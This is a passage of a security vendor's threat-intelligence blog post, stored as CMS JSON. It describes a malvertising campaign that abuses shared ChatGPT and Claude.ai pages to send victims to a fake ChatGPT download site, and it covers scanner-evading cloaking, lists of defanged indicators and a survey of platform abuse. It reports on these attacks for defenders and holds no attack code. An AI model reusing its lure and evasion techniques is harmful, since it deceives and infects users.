URL reputation checks before the victim even reaches the malicious payload.",{"data":6996,"content":6997,"nodeType":695},{},[6998,7002,7010,7014,7022],{"data":6999,"marks":7000,"value":7001,"nodeType":699},{},[],"Several variants of this technique have been ",{"data":7003,"content":7005,"nodeType":791},{"uri":7004},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-abuse-google-ads-claudeai-chats-to-push-mac-malware\u002F",[7006],{"data":7007,"marks":7008,"value":7009,"nodeType":699},{},[],"reported over the past few months",{"data":7011,"marks":7012,"value":7013,"nodeType":699},{},[],". The earliest examples used shared Claude.ai conversations disguised as installation guides — complete with fake \"Apple Support\" attribution — that walked users through opening a terminal and pasting a curl command that downloaded and executed an infostealer. ",{"data":7015,"content":7017,"nodeType":791},{"uri":7016},"https:\u002F\u002Fwww.kaspersky.com\u002Fblog\u002Fshare-chatgpt-chat-clickfix-macos-amos-infostealer\u002F54928\u002F",[7018],{"data":7019,"marks":7020,"value":7021,"nodeType":699},{},[],"Kaspersky documented a parallel campaign",{"data":7023,"marks":7024,"value":7025,"nodeType":699},{},[]," using shared ChatGPT conversations to deliver the AMOS (Atomic macOS Stealer) via the same paste-this-command social engineering pattern. ",{"data":7027,"content":7028,"nodeType":695},{},[7029],{"data":7030,"marks":7031,"value":7032,"nodeType":699},{},[],"Push has detected a new variant that goes beyond the previously reported technique of embedding terminal commands in shared conversations: the attacker has used ChatGPT's code rendering feature to build a fully designed fake page that mimics a ChatGPT service disruption, redirecting victims to a convincing clone of ChatGPT's download page that delivers a malicious executable. ",{"data":7034,"content":7038,"nodeType":1041},{"target":7035},{"sys":7036},{"id":7037,"type":1046,"linkType":1047},"5lz9zt223pecGvdaqdvSTQ",[],{"data":7040,"content":7044,"nodeType":1041},{"target":7041},{"sys":7042},{"id":7043,"type":1046,"linkType":1047},"51GomAj3VOjnbmgd1DWYu0",[],{"data":7046,"content":7047,"nodeType":695},{},[7048,7053],{"data":7049,"marks":7050,"value":7052,"nodeType":699},{},[7051],{"type":707},"This is a live campaign which is still generating detections across our customer base at the time of writing. ",{"data":7054,"marks":7055,"value":7056,"nodeType":699},{},[],"Push customers are already protected and do not need to take further action. The malicious page URLs can be found at the end of this report but are not exhaustive and are liable to change. ",{"data":7058,"content":7059,"nodeType":721},{},[],{"data":7061,"content":7062,"nodeType":725},{},[7063],{"data":7064,"marks":7065,"value":7067,"nodeType":699},{},[7066],{"type":707},"A fake page, not a fake conversation",{"data":7069,"content":7070,"nodeType":695},{},[7071,7075,7080],{"data":7072,"marks":7073,"value":7074,"nodeType":699},{},[],"Previously reported variants relied on shared ",{"data":7076,"marks":7077,"value":7079,"nodeType":699},{},[7078],{"type":970},"conversations",{"data":7081,"marks":7082,"value":7083,"nodeType":699},{},[]," — the attacker created a chat that contained step-by-step instructions for the victim to follow, typically involving pasting a command into their terminal. The social engineering was conversational: the \"AI assistant\" appeared to be helpfully guiding the user through an installation process.",{"data":7085,"content":7086,"nodeType":695},{},[7087],{"data":7088,"marks":7089,"value":7090,"nodeType":699},{},[],"But now, rather than a shared conversation, the attacker has used ChatGPT's code rendering feature to create a fully designed, self-contained web page hosted at a chatgpt.com\u002Fs\u002F URL. It renders as what appears to be a ChatGPT service disruption notice:",{"data":7092,"content":7096,"nodeType":1041},{"target":7093},{"sys":7094},{"id":7095,"type":1046,"linkType":1047},"1O9gyQab81SnbxhQp2aa5Z",[],{"data":7098,"content":7099,"nodeType":695},{},[7100],{"data":7101,"marks":7102,"value":7103,"nodeType":699},{},[],"A professional-looking error message reads: \"We're experiencing high traffic right now. Our website is temporarily unavailable due to a large number of users. Download our desktop app to continue.\" A prominent download button sits below.",{"data":7105,"content":7106,"nodeType":695},{},[7107],{"data":7108,"marks":7109,"value":7110,"nodeType":699},{},[],"The \"Show code\" toggle at the top of the page reveals what's actually happening — the entire thing is custom HTML and CSS, authored to mimic a ChatGPT system notice, rendered using ChatGPT's code output feature. A web page inside a web page, hosted on a domain that every URL reputation system in the world considers safe.",{"data":7112,"content":7116,"nodeType":1041},{"target":7113},{"sys":7114},{"id":7115,"type":1046,"linkType":1047},"4kQTfxB3aVH9W9BeYOuljP",[],{"data":7118,"content":7119,"nodeType":721},{},[],{"data":7121,"content":7122,"nodeType":725},{},[7123],{"data":7124,"marks":7125,"value":7127,"nodeType":699},{},[7126],{"type":707},"The download page",{"data":7129,"content":7130,"nodeType":695},{},[7131],{"data":7132,"marks":7133,"value":7134,"nodeType":699},{},[],"Clicking the download button redirects the user to openew[.]app, which presents a convincing clone of ChatGPT's official desktop application download page — complete with OpenAI branding, macOS and Windows download buttons, a Chrome extension link, and a mobile download section.",{"data":7136,"content":7140,"nodeType":1041},{"target":7137},{"sys":7138},{"id":7139,"type":1046,"linkType":1047},"4MdFc4OB37ZihTGx506QJ6",[],{"data":7142,"content":7146,"nodeType":1041},{"target":7143},{"sys":7144},{"id":7145,"type":1046,"linkType":1047},"LaPUy0zpIeY8s4PF2wkat",[],{"data":7148,"content":7149,"nodeType":695},{},[7150],{"data":7151,"marks":7152,"value":7153,"nodeType":699},{},[],"The site also displays differently depending on who visits it. When Push researchers examined the URL via URLScan, the scanner was redirected to a different page entirely — a generic AR\u002FVR company website with no obvious connection to ChatGPT. ",{"data":7155,"content":7156,"nodeType":695},{},[7157],{"data":7158,"marks":7159,"value":7160,"nodeType":699},{},[],"Real users in a browser see the fake download page; automated scanners and bots see something benign. This kind of conditional rendering is a well-established evasion technique in the malvertising ecosystem, and it makes the malicious infrastructure harder for security teams and threat intelligence services to identify and analyze.",{"data":7162,"content":7163,"nodeType":695},{},[7164,7168,7176],{"data":7165,"marks":7166,"value":7167,"nodeType":699},{},[],"The downloaded executable poses as \"ChatGPT for Desktop\" and is ",{"data":7169,"content":7171,"nodeType":791},{"uri":7170},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fde8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",[7172],{"data":7173,"marks":7174,"value":7175,"nodeType":699},{},[],"flagged on VirusTotal",{"data":7177,"marks":7178,"value":1407,"nodeType":699},{},[],{"data":7180,"content":7184,"nodeType":1041},{"target":7181},{"sys":7182},{"id":7183,"type":1046,"linkType":1047},"3FSbwoFJYQrcyo9uMsQIWI",[],{"data":7186,"content":7187,"nodeType":721},{},[],{"data":7189,"content":7190,"nodeType":725},{},[7191],{"data":7192,"marks":7193,"value":7195,"nodeType":699},{},[7194],{"type":707},"The Claude variant: same campaign, different platform",{"data":7197,"content":7198,"nodeType":695},{},[7199,7203,7210],{"data":7200,"marks":7201,"value":7202,"nodeType":699},{},[],"Alongside the ChatGPT rendered-page variant, Push has also detected the previously reported style of attack using shared Claude.ai conversations. These follow the pattern documented by ",{"data":7204,"content":7205,"nodeType":791},{"uri":7004},[7206],{"data":7207,"marks":7208,"value":7209,"nodeType":699},{},[],"BleepingComputer",{"data":7211,"marks":7212,"value":7213,"nodeType":699},{},[],": a shared chat disguised as a \"Claude Code on Mac\" installation guide, attributed to \"Apple Support,\" containing a curl command that downloads and executes malware.",{"data":7215,"content":7219,"nodeType":1041},{"target":7216},{"sys":7217},{"id":7218,"type":1046,"linkType":1047},"5sWayuTsVdiLSLoS4sv2Vc",[],{"data":7221,"content":7222,"nodeType":695},{},[7223],{"data":7224,"marks":7225,"value":7226,"nodeType":699},{},[],"The fact that both the ChatGPT and Claude variants are appearing in Push customer environments suggests a campaign — or at least a shared playbook — that is actively experimenting with different platforms and different social engineering approaches to find what converts best.",{"data":7228,"content":7229,"nodeType":721},{},[],{"data":7231,"content":7232,"nodeType":725},{},[7233],{"data":7234,"marks":7235,"value":7237,"nodeType":699},{},[7236],{"type":707},"Malvertising remains one of the top phishing delivery channels",{"data":7239,"content":7240,"nodeType":695},{},[7241],{"data":7242,"marks":7243,"value":7244,"nodeType":699},{},[],"Push has detected this variant across multiple customer environments, with users arriving at these shared chat URLs after searching for terms including \"chatgpt,\" \"chatgpt free,\" \"chat gpt,\" and common typos like \"chatgo,\" \"chatgot,\" and \"cvhatgpt.\" ",{"data":7246,"content":7247,"nodeType":695},{},[7248],{"data":7249,"marks":7250,"value":7251,"nodeType":699},{},[],"You can see an example of this below: it's incredibly convincing, and uses the real ChatGPT domain — so even users that are paying attention are liable to fall for it. ",{"data":7253,"content":7257,"nodeType":1041},{"target":7254},{"sys":7255},{"id":7256,"type":1046,"linkType":1047},"1GYWOyHpZT1rdTm6IGOKu8",[],{"data":7259,"content":7263,"nodeType":1041},{"target":7260},{"sys":7261},{"id":7262,"type":1046,"linkType":1047},"4HpFJRAZH2lbygaEk2xOnN",[],{"data":7265,"content":7266,"nodeType":695},{},[7267,7271,7279,7283,7291,7295,7304],{"data":7268,"marks":7269,"value":7270,"nodeType":699},{},[],"This fits a pattern Push has tracked extensively. ",{"data":7272,"content":7274,"nodeType":791},{"uri":7273},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fverizon-dbir-2026-review\u002F",[7275],{"data":7276,"marks":7277,"value":7278,"nodeType":699},{},[],"Search-based delivery is now the dominant channel for malware distribution",{"data":7280,"marks":7281,"value":7282,"nodeType":699},{},[]," — our own data shows that ClickFix attacks are reached via search results rather than email in 4 of 5 cases, and Push's own research into ",{"data":7284,"content":7286,"nodeType":791},{"uri":7285},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fanalysing-a-sophisticated-google-malvertising-attack\u002F",[7287],{"data":7288,"marks":7289,"value":7290,"nodeType":699},{},[],"malvertising campaigns impersonating brands like TradingView",{"data":7292,"marks":7293,"value":7294,"nodeType":699},{},[]," and ",{"data":7296,"content":7298,"nodeType":791},{"uri":7297},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fgoogle-search-malvertising-campaign-continues-now-impersonating-ahrefs\u002F",[7299],{"data":7300,"marks":7301,"value":7303,"nodeType":699},{},[7302],{"type":799},"Ahrefs",{"data":7305,"marks":7306,"value":7307,"nodeType":699},{},[]," has demonstrated how effectively search ads can funnel victims to malicious pages. ",{"data":7309,"content":7310,"nodeType":695},{},[7311],{"data":7312,"marks":7313,"value":7314,"nodeType":699},{},[],"The shared-chat technique adds a new dimension: the destination URL itself is genuine (chatgpt.com, claude.ai), which means even a cautious user who checks the URL before clicking will see nothing suspicious.",{"data":7316,"content":7317,"nodeType":721},{},[],{"data":7319,"content":7320,"nodeType":725},{},[7321],{"data":7322,"marks":7323,"value":7325,"nodeType":699},{},[7324],{"type":707},"Legitimate platform abuse is everywhere",{"data":7327,"content":7328,"nodeType":695},{},[7329],{"data":7330,"marks":7331,"value":7332,"nodeType":699},{},[],"This is one example of a much broader pattern that has become one of the defining characteristics of the 2026 threat landscape: attackers systematically abusing legitimate platforms as attack infrastructure. The scale and variety of this abuse in recent months alone is striking, and it spans every stage of the phishing chain.",{"data":7334,"content":7335,"nodeType":769},{},[7336],{"data":7337,"marks":7338,"value":7339,"nodeType":699},{},[],"Legit platform abuse for delivery",{"data":7341,"content":7342,"nodeType":695},{},[7343,7347,7355,7359,7367,7371,7379],{"data":7344,"marks":7345,"value":7346,"nodeType":699},{},[],"On the delivery side, attackers have been ",{"data":7348,"content":7350,"nodeType":791},{"uri":7349},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Famazon-ses-increasingly-abused-in-phishing-to-evade-detection\u002F",[7351],{"data":7352,"marks":7353,"value":7354,"nodeType":699},{},[],"weaponizing stolen AWS credentials to send phishing through Amazon SES",{"data":7356,"marks":7357,"value":7358,"nodeType":699},{},[]," that passes SPF, DKIM, and DMARC validation because SES is a legitimate Amazon service. A Vietnamese operation dubbed ",{"data":7360,"content":7362,"nodeType":791},{"uri":7361},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F05\u002F30000-facebook-accounts-hacked-via.html",[7363],{"data":7364,"marks":7365,"value":7366,"nodeType":699},{},[],"AccountDumpling used Google AppSheet's built-in email capability",{"data":7368,"marks":7369,"value":7370,"nodeType":699},{},[]," as a phishing relay to harvest 30,000 Facebook credentials. ",{"data":7372,"content":7374,"nodeType":791},{"uri":7373},"https:\u002F\u002Ftechcrunch.com\u002F2026\u002F05\u002F21\u002Fscammers-are-abusing-an-internal-microsoft-account-to-send-spam\u002F",[7375],{"data":7376,"marks":7377,"value":7378,"nodeType":699},{},[],"Scammers exploited Microsoft's own internal notification pipeline",{"data":7380,"marks":7381,"value":7382,"nodeType":699},{},[]," — sending phishing from the same msonlineservicesteam@microsoftonline.com address that delivers legitimate 2FA codes — with Spamhaus confirming months of ongoing abuse.",{"data":7384,"content":7385,"nodeType":769},{},[7386],{"data":7387,"marks":7388,"value":7389,"nodeType":699},{},[],"Legit platform abuse for hosting",{"data":7391,"content":7392,"nodeType":695},{},[7393,7397,7405,7409,7417],{"data":7394,"marks":7395,"value":7396,"nodeType":699},{},[],"For hosting, the platforms being abused read like a who's who of modern web infrastructure. ",{"data":7398,"content":7400,"nodeType":791},{"uri":7399},"https:\u002F\u002Fwww.securityweek.com\u002Fover-500-organizations-hit-in-years-long-phishing-campaign\u002F",[7401],{"data":7402,"marks":7403,"value":7404,"nodeType":699},{},[],"Operation HookedWing ran for four years",{"data":7406,"marks":7407,"value":7408,"nodeType":699},{},[]," on GitHub Pages and Vercel, compromising 500+ organizations across more than 100 GitHub Pages domains before anyone documented it publicly. Cofense has separately ",{"data":7410,"content":7412,"nodeType":791},{"uri":7411},"https:\u002F\u002Fcofense.com\u002Fblog\u002Fsteal-smarter-not-harder-malicious-use-of-vercel-for-credential-phishing\u002F",[7413],{"data":7414,"marks":7415,"value":7416,"nodeType":699},{},[],"documented the growing abuse of Vercel",{"data":7418,"marks":7419,"value":7420,"nodeType":699},{},[]," for credential phishing hosting. Pixm's Q1 2026 phishing report tracked over 100 unique Azure Blob Storage subdomain variants hosting phishing content that carried Microsoft's own domain reputation, alongside abuse of Cloudflare CDN, Cloudflare Workers, Cloudflare R2, Backblaze B2, and Supabase. ",{"data":7422,"content":7423,"nodeType":769},{},[7424],{"data":7425,"marks":7426,"value":7427,"nodeType":699},{},[],"Abuse of compromised websites that are otherwise legit",{"data":7429,"content":7430,"nodeType":695},{},[7431,7435,7443,7447,7455,7459,7467],{"data":7432,"marks":7433,"value":7434,"nodeType":699},{},[],"Compromised legitimate sites are also being repurposed at scale. A mass exploitation of a ",{"data":7436,"content":7438,"nodeType":791},{"uri":7437},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign\u002F",[7439],{"data":7440,"marks":7441,"value":7442,"nodeType":699},{},[],"Ghost CMS vulnerability planted ClickFix pages across 700+ websites",{"data":7444,"marks":7445,"value":7446,"nodeType":699},{},[]," including Harvard, Oxford, and DuckDuckGo subdomains. Microsoft recently documented a campaign where ",{"data":7448,"content":7450,"nodeType":791},{"uri":7449},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F05\u002F26\u002Fpoisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities\u002F",[7451],{"data":7452,"marks":7453,"value":7454,"nodeType":699},{},[],"SEO poisoning was combined with AI chatbot recommendation manipulation",{"data":7456,"marks":7457,"value":7458,"nodeType":699},{},[]," to deliver GPU mining malware — extending the poisoning from traditional search results into AI-generated software recommendations. And ",{"data":7460,"content":7462,"nodeType":791},{"uri":7461},"https:\u002F\u002Fwww.helpnetsecurity.com\u002F2026\u002F05\u002F27\u002Fdeno-rat-malware-fake-chatgpt-claude-installers\u002F",[7463],{"data":7464,"marks":7465,"value":7466,"nodeType":699},{},[],"fake ChatGPT and Claude installers on GitHub and SourceForge",{"data":7468,"marks":7469,"value":7470,"nodeType":699},{},[]," have been delivering the DinDoor backdoor and a Deno-based RAT via repositories that mimic legitimate developer tool distributions.",{"data":7472,"content":7473,"nodeType":695},{},[7474],{"data":7475,"marks":7476,"value":7477,"nodeType":699},{},[],"The structural problem is that every one of these platforms is genuinely legitimate, and the security controls that evaluate them — domain reputation, email authentication, URL categorization — confirm them as trusted because they are trusted. This attack extends this pattern into new territory by weaponizing the content-sharing features of AI chatbot platforms specifically, but the underlying principles are the same. ",{"data":7479,"content":7480,"nodeType":721},{},[],{"data":7482,"content":7483,"nodeType":725},{},[7484],{"data":7485,"marks":7486,"value":7488,"nodeType":699},{},[7487],{"type":707},"Impact analysis",{"data":7490,"content":7491,"nodeType":695},{},[7492,7496,7504],{"data":7493,"marks":7494,"value":7495,"nodeType":699},{},[],"Shared-chat malware delivery exploits a structural property of AI platforms that traditional security controls aren't designed to handle. Domain reputation, URL categorization, and safe browsing databases all treat chatgpt.com and claude.ai as trusted — because they are. Using these trusted pages to link off to further convincing-looking pages hosting malware allows the attacker to run campaigns that blend in, as well as rotate the phishing delivery pages later in the chain should they ever be flagged, allowing the campaign to continue without interruption (a well known ",{"data":7497,"content":7499,"nodeType":791},{"uri":7498},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002F",[7500],{"data":7501,"marks":7502,"value":7503,"nodeType":699},{},[],"detection evasion technique",{"data":7505,"marks":7506,"value":7507,"nodeType":699},{},[],"). ",{"data":7509,"content":7510,"nodeType":695},{},[7511],{"data":7512,"marks":7513,"value":7514,"nodeType":699},{},[],"What makes the rendered-page variant particularly concerning is that it eliminates the most obvious red flag in the earlier attacks. The Claude.ai conversation variants required the victim to recognize that a shared chat instructing them to paste terminal commands might be suspicious — a tall order for many users, but at least the attack surface was visible. The rendered-page variant shows nothing that looks like an attack. It presents what appears to be a routine service disruption with a reasonable call to action: download the desktop app to continue using ChatGPT. ",{"data":7516,"content":7517,"nodeType":769},{},[7518],{"data":7519,"marks":7520,"value":7522,"nodeType":699},{},[7521],{"type":707},"How Push detected the attack",{"data":7524,"content":7525,"nodeType":695},{},[7526,7530,7535],{"data":7527,"marks":7528,"value":7529,"nodeType":699},{},[],"We've aligned our detection logic for this technique under the name ",{"data":7531,"marks":7532,"value":7534,"nodeType":699},{},[7533],{"type":707},"LLMShare",{"data":7536,"marks":7537,"value":7538,"nodeType":699},{},[]," — a technique-level detection that covers shared content abuse across LLM platforms, not tied to any single campaign or set of IOCs. ",{"data":7540,"content":7541,"nodeType":695},{},[7542],{"data":7543,"marks":7544,"value":7545,"nodeType":699},{},[],"Because Push sees the full context of how a user arrived at a page and what that page does once it renders, we can identify LLMShare attacks regardless of which AI platform is being abused or what social engineering wrapper the attacker has chosen. ",{"data":7547,"content":7548,"nodeType":695},{},[7549,7553,7561],{"data":7550,"marks":7551,"value":7552,"nodeType":699},{},[],"When we identified the initial instances of this campaign, we used our ",{"data":7554,"content":7556,"nodeType":791},{"uri":7555},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fcan-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline\u002F",[7557],{"data":7558,"marks":7559,"value":7560,"nodeType":699},{},[],"agentic threat hunting pipeline",{"data":7562,"marks":7563,"value":7564,"nodeType":699},{},[]," to hunt for additional examples across our customer telemetry, develop the LLMShare detection, and rapidly deploy it to customers. Push blocks users from interacting with the page before any malicious activity can occur. ",{"data":7566,"content":7567,"nodeType":695},{},[7568],{"data":7569,"marks":7570,"value":7571,"nodeType":699},{},[],"Push customers do not need to take any further action.",{"data":7573,"content":7574,"nodeType":721},{},[],{"data":7576,"content":7577,"nodeType":695},{},[7578],{"data":7579,"marks":7580,"value":909,"nodeType":699},{},[],{"data":7582,"content":7583,"nodeType":695},{},[7584],{"data":7585,"marks":7586,"value":916,"nodeType":699},{},[],{"data":7588,"content":7589,"nodeType":695},{},[7590,7593,7600],{"data":7591,"marks":7592,"value":21,"nodeType":699},{},[],{"data":7594,"content":7595,"nodeType":791},{"uri":3629},[7596],{"data":7597,"marks":7598,"value":930,"nodeType":699},{},[7599],{"type":799},{"data":7601,"marks":7602,"value":21,"nodeType":699},{},[],{"data":7604,"content":7605,"nodeType":721},{},[],{"data":7607,"content":7608,"nodeType":725},{},[7609],{"data":7610,"marks":7611,"value":7613,"nodeType":699},{},[7612],{"type":707},"Indicators of compromise",{"data":7615,"content":7616,"nodeType":695},{},[7617,7621,7629],{"data":7618,"marks":7619,"value":7620,"nodeType":699},{},[],"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",{"data":7622,"content":7624,"nodeType":791},{"uri":7623},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Fdomain-rotation-redirection\u002F",[7625],{"data":7626,"marks":7627,"value":7628,"nodeType":699},{},[],"quickly spin up and rotate the sites used",{"data":7630,"marks":7631,"value":7632,"nodeType":699},{},[]," in the attack chain. IoC-based detections for campaigns like this are of limited value.",{"data":7634,"content":7635,"nodeType":695},{},[7636],{"data":7637,"marks":7638,"value":7639,"nodeType":699},{},[],"At the time of writing, the indicators observed were:",{"data":7641,"content":7642,"nodeType":4687},{},[7643,7669,7692,7714,7737],{"data":7644,"content":7645,"nodeType":4691},{},[7646,7658],{"data":7647,"content":7648,"nodeType":7657},{},[7649],{"data":7650,"content":7651,"nodeType":695},{},[7652],{"data":7653,"marks":7654,"value":7656,"nodeType":699},{},[7655],{"type":707},"Indicator","table-header-cell",{"data":7659,"content":7660,"nodeType":7657},{},[7661],{"data":7662,"content":7663,"nodeType":695},{},[7664],{"data":7665,"marks":7666,"value":7668,"nodeType":699},{},[7667],{"type":707},"Type",{"data":7670,"content":7671,"nodeType":4691},{},[7672,7682],{"data":7673,"content":7674,"nodeType":4695},{},[7675],{"data":7676,"content":7677,"nodeType":695},{},[7678],{"data":7679,"marks":7680,"value":7681,"nodeType":699},{},[],"hxxps:\u002F\u002Fclaude[.]ai\u002Fshare\u002F8e6401b5-4849-46c4-a3cb-29e1c3c49131",{"data":7683,"content":7684,"nodeType":4695},{},[7685],{"data":7686,"content":7687,"nodeType":695},{},[7688],{"data":7689,"marks":7690,"value":7691,"nodeType":699},{},[],"URL",{"data":7693,"content":7694,"nodeType":4691},{},[7695,7705],{"data":7696,"content":7697,"nodeType":4695},{},[7698],{"data":7699,"content":7700,"nodeType":695},{},[7701],{"data":7702,"marks":7703,"value":7704,"nodeType":699},{},[],"hxxps:\u002F\u002Fchatgpt[.]com\u002Fs\u002Fcb_6a0f1e6bbec88191aa7fede27163f08d",{"data":7706,"content":7707,"nodeType":4695},{},[7708],{"data":7709,"content":7710,"nodeType":695},{},[7711],{"data":7712,"marks":7713,"value":7691,"nodeType":699},{},[],{"data":7715,"content":7716,"nodeType":4691},{},[7717,7727],{"data":7718,"content":7719,"nodeType":4695},{},[7720],{"data":7721,"content":7722,"nodeType":695},{},[7723],{"data":7724,"marks":7725,"value":7726,"nodeType":699},{},[],"openew[.]app",{"data":7728,"content":7729,"nodeType":4695},{},[7730],{"data":7731,"content":7732,"nodeType":695},{},[7733],{"data":7734,"marks":7735,"value":7736,"nodeType":699},{},[],"Domain",{"data":7738,"content":7739,"nodeType":4691},{},[7740,7750],{"data":7741,"content":7742,"nodeType":4695},{},[7743],{"data":7744,"content":7745,"nodeType":695},{},[7746],{"data":7747,"marks":7748,"value":7749,"nodeType":699},{},[],"de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",{"data":7751,"content":7752,"nodeType":4695},{},[7753],{"data":7754,"content":7755,"nodeType":695},{},[7756],{"data":7757,"marks":7758,"value":7759,"nodeType":699},{},[],"SHA256",{"data":7761,"content":7762,"nodeType":695},{},[7763],{"data":7764,"marks":7765,"value":21,"nodeType":699},{},[],"LLMShare: how attackers are turning AI chatbot pages into malware delivery platforms","How attackers are using shared content features on AI chatbot platforms to deliver malware via pages hosted on legitimate domains, sent via malvertising.","2026-05-29T00:00:00.000Z","llmshare-malvertising-campaign",{"items":7771},[7772,7774],{"sys":7773,"name":1833},{"id":1832},{"sys":7775,"name":1837},{"id":1836},{"items":7777},[7778],{"fullName":7779,"firstName":7780,"jobTitle":7781,"profilePicture":7782},"Keanu Maharaj","Keanu","Senior Security Researcher",{"url":7783},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FVCGOm62jiocjwngWTh32U\u002Fe9a30637b1c76bf988d2fec90f5b6c36\u002F1689361049351_1.png","the-state-of-clickfix-by-detection-data","blog\u002Fthe-state-of-clickfix-by-detection-data",{"json":7787},{"data":7788,"content":7789,"nodeType":691},{},[7790],{"data":7791,"content":7792,"nodeType":695},{},[7793],{"data":7794,"marks":7795,"value":7796,"nodeType":699},{},[],"ClickFix and derivative techniques now make up more than half of Push’s detections each month, with Attacker-in-the-Middle (AiTM) and device code phishing rounding out the top three. In this blog, we’re diving into our ClickFix data to give you the key trends and developments as we close out 2026. ","Diving into our ClickFix data to give you the key trends and developments as we close out 2026. ",{"id":7799,"publishedAt":7800},"3cLkjEBzRdI2CTq6oNohab","2026-09-25T13:52:26.369Z",{"items":7802},[7803],{"sys":7804,"name":1833},{"id":1832},{"items":7806},[7807,7811,7813,7818,7823,7828,7833,7835,7840,7844,7849],{"sys":7808,"name":4727,"slug":7810,"tier":45},{"id":7809},"topic-clickfix","clickfix",{"sys":7812,"name":3708,"slug":3709,"tier":31},{"id":3707},{"sys":7814,"name":7816,"slug":7817,"tier":45},{"id":7815},"topic-malware-delivery","Malware delivery","malware-delivery",{"sys":7819,"name":7821,"slug":7822,"tier":45},{"id":7820},"topic-seo-poisoning","SEO poisoning","seo-poisoning",{"sys":7824,"name":7826,"slug":7827,"tier":45},{"id":7825},"topic-edr","EDR","edr",{"sys":7829,"name":7831,"slug":7832,"tier":45},{"id":7830},"topic-ai-attacks","AI attacks","ai-attacks",{"sys":7834,"name":3703,"slug":3704,"tier":45},{"id":3702},{"sys":7836,"name":7838,"slug":7839,"tier":45},{"id":7837},"topic-infostealer","Infostealer","infostealer",{"sys":7841,"name":304,"slug":7843,"tier":45},{"id":7842},"topic-session-hijacking","session-hijacking",{"sys":7845,"name":7847,"slug":7848,"tier":45},{"id":7846},"topic-malvertising","Malvertising","malvertising",{"sys":7850,"name":7852,"slug":7853,"tier":31},{"id":7851},"topic-threat-landscape","Threat landscape","threat-landscape","34vesPBcKkBOcosSxUJVLyxlDOQkrlmqqLN8MFrusEo",{"id":7856,"title":1824,"authorsCollection":7857,"content":7862,"extension":942,"faqItemsCollection":8790,"faqTitle":60,"featured":6,"hashTags":60,"meta":8792,"metaTitle":8793,"ogImage":60,"postType":8794,"publishedDate":1826,"relatedBlogPostsCollection":8795,"slug":1827,"stem":11417,"subtitle":60,"summary":11418,"synopsis":1825,"sys":11429,"tagsCollection":11431,"topicsCollection":11437,"__hash__":11518},"blog\u002Fblog\u002F6-browser-based-attacks-every-security-team-should-be-prepared-for.json",{"items":7858},[7859],{"fullName":1841,"firstName":1842,"jobTitle":1843,"socialLinks":7860,"profilePicture":7861},[3722],{"url":1845},{"json":7863,"links":8583},{"nodeType":691,"data":7864,"content":7865},{},[7866,7879,7885,7888,7895,7901,7907,7932,7937,7943,7949,7955,7958,7965,7971,7974,7981,7987,7992,7998,8003,8019,8025,8031,8037,8042,8045,8052,8058,8063,8087,8093,8106,8121,8127,8132,8135,8142,8157,8163,8182,8208,8236,8242,8247,8250,8257,8263,8268,8283,8289,8311,8335,8340,8343,8350,8356,8361,8376,8382,8424,8455,8461,8466,8469,8476,8482,8488,8510,8525,8530,8533,8540,8555,8561,8567],{"nodeType":695,"data":7867,"content":7868},{},[7869,7872,7876],{"nodeType":699,"value":963,"marks":7870,"data":7871},[],{},{"nodeType":699,"value":967,"marks":7873,"data":7875},[7874],{"type":970},{},{"nodeType":699,"value":973,"marks":7877,"data":7878},[],{},{"nodeType":695,"data":7880,"content":7881},{},[7882],{"nodeType":699,"value":980,"marks":7883,"data":7884},[],{},{"nodeType":721,"data":7886,"content":7887},{},[],{"nodeType":725,"data":7889,"content":7890},{},[7891],{"nodeType":699,"value":990,"marks":7892,"data":7894},[7893],{"type":707},{},{"nodeType":695,"data":7896,"content":7897},{},[7898],{"nodeType":699,"value":998,"marks":7899,"data":7900},[],{},{"nodeType":695,"data":7902,"content":7903},{},[7904],{"nodeType":699,"value":1005,"marks":7905,"data":7906},[],{},{"nodeType":695,"data":7908,"content":7909},{},[7910,7913,7920,7923,7929],{"nodeType":699,"value":1012,"marks":7911,"data":7912},[],{},{"nodeType":791,"data":7914,"content":7915},{"uri":1017},[7916],{"nodeType":699,"value":1020,"marks":7917,"data":7919},[7918],{"type":799},{},{"nodeType":699,"value":1025,"marks":7921,"data":7922},[],{},{"nodeType":791,"data":7924,"content":7925},{"uri":1030},[7926],{"nodeType":699,"value":1033,"marks":7927,"data":7928},[],{},{"nodeType":699,"value":1037,"marks":7930,"data":7931},[],{},{"nodeType":1041,"data":7933,"content":7936},{"target":7934},{"sys":7935},{"id":1045,"type":1046,"linkType":1047},[],{"nodeType":695,"data":7938,"content":7939},{},[7940],{"nodeType":699,"value":1053,"marks":7941,"data":7942},[],{},{"nodeType":695,"data":7944,"content":7945},{},[7946],{"nodeType":699,"value":1060,"marks":7947,"data":7948},[],{},{"nodeType":695,"data":7950,"content":7951},{},[7952],{"nodeType":699,"value":1067,"marks":7953,"data":7954},[],{},{"nodeType":721,"data":7956,"content":7957},{},[],{"nodeType":725,"data":7959,"content":7960},{},[7961],{"nodeType":699,"value":1077,"marks":7962,"data":7964},[7963],{"type":707},{},{"nodeType":695,"data":7966,"content":7967},{},[7968],{"nodeType":699,"value":1085,"marks":7969,"data":7970},[],{},{"nodeType":721,"data":7972,"content":7973},{},[],{"nodeType":769,"data":7975,"content":7976},{},[7977],{"nodeType":699,"value":1095,"marks":7978,"data":7980},[7979],{